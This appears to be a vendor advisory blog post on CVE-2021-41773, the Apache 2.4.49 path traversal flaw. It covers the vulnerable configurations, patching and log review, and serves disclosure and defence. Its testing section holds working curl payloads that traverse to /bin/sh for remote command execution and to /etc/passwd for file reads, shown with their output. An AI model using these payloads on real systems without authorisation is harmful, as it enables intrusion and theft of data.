On October 5, 2021, the Apache Software Foundation provided an update that patched CVE-2021-41773. This vulnerability is a path normalization issue that can be leveraged to read arbitrary files and in some cases execute remote code in Apache’s widely adopted HTTP Server. It affects version 2.4.49 only but is actively being exploited in the wild and Randori has found numerous matching versions exposed on internet-facing assets.
The Randori Attack Team has successfully developed a reliable working exploit, tested it in a lab environment and began leveraging the capability as part of Randori’s continuous and automated red team platform. Under the right configuration settings, this vulnerability is trivial to exploit and affected organizations should patch immediately.
For defenders looking for a way to understand if they are impacted, the Randori Attack Team has provided details on the non-default configurations required for successful exploitation and steps organizations can take to test for the vulnerability.
Exploitable Configurations
To successfully exploit CVE-2021-41773, Apache 2.4.49 must be set up in a non-default configuration.
There are two configuration patterns that are susceptible to two different exploitation techniques:
- If mod_cgi is enabled and “require all granted” is applied to the default Directory block, then an attacker can execute remote code with permissions of the user running Apache.
- If mod_cgi is not enabled and “require all granted” is applied to the default Directory block, then an attacker can read arbitrary files with permissions of the user running Apache.
If a system has these configurations exploitation of this vulnerability is trivial. If “require all granted” is present for any path exploitation may be possible and other cases may exist. Randori recommends upgrading to Apache 2.4.50.
How To Test For Vulnerability
Scenario 1: Vulnerable to Remote Code Execution
Example of remote code execution on a system with mod_cgi enabled.
| curl ‘$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh’ -d ‘echo;id’
uid=1(daemon) gid=1(daemon) groups=1(daemon) |
Scenario 2: Vulnerable to File Inclusion
Example of reading a file on a vulnerable system without mod_cgi enabled.
| curl ‘$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd’
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin |
Scenario 2: Vulnerable to File Inclusion but not Remote Code Execution
Example of trying to run a command on a system that is vulnerable to file disclosure but does not have mod_cgi enabled.
| $ curl ‘$HOST/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh’ -d ‘echo;id’
Warning: Binary output can mess up your terminal. Use “–output -” to tell Warning: curl to output it to your terminal anyway, or consider “–output Warning: <FILE>” to save to a file. |
Recommended Actions
Based on our research, we can confirm that for organizations running Apache 2.4.49 with a vulnerable configuration this issue is serious and action should be taken to ensure the security of impacted devices.
The vulnerability was made public on October 5; therefore, organizations running instances of Apache 2.4.49 exposed to the Internet from that date forward should assume that an adversary may have gained access to their network. Randori recommends reviewing historical logs for anomalous behavior such as abnormal URL paths, source IP connections, and other signs of compromise.
Organizations unsure of their exposure or looking to confirm their risk can request a free attack surface audit from Randori. This personalized assessment will analyze your organized exposed internet-facing asset and provide a custom assessment of your most tempting access and recommendations on how to reduce your risk.
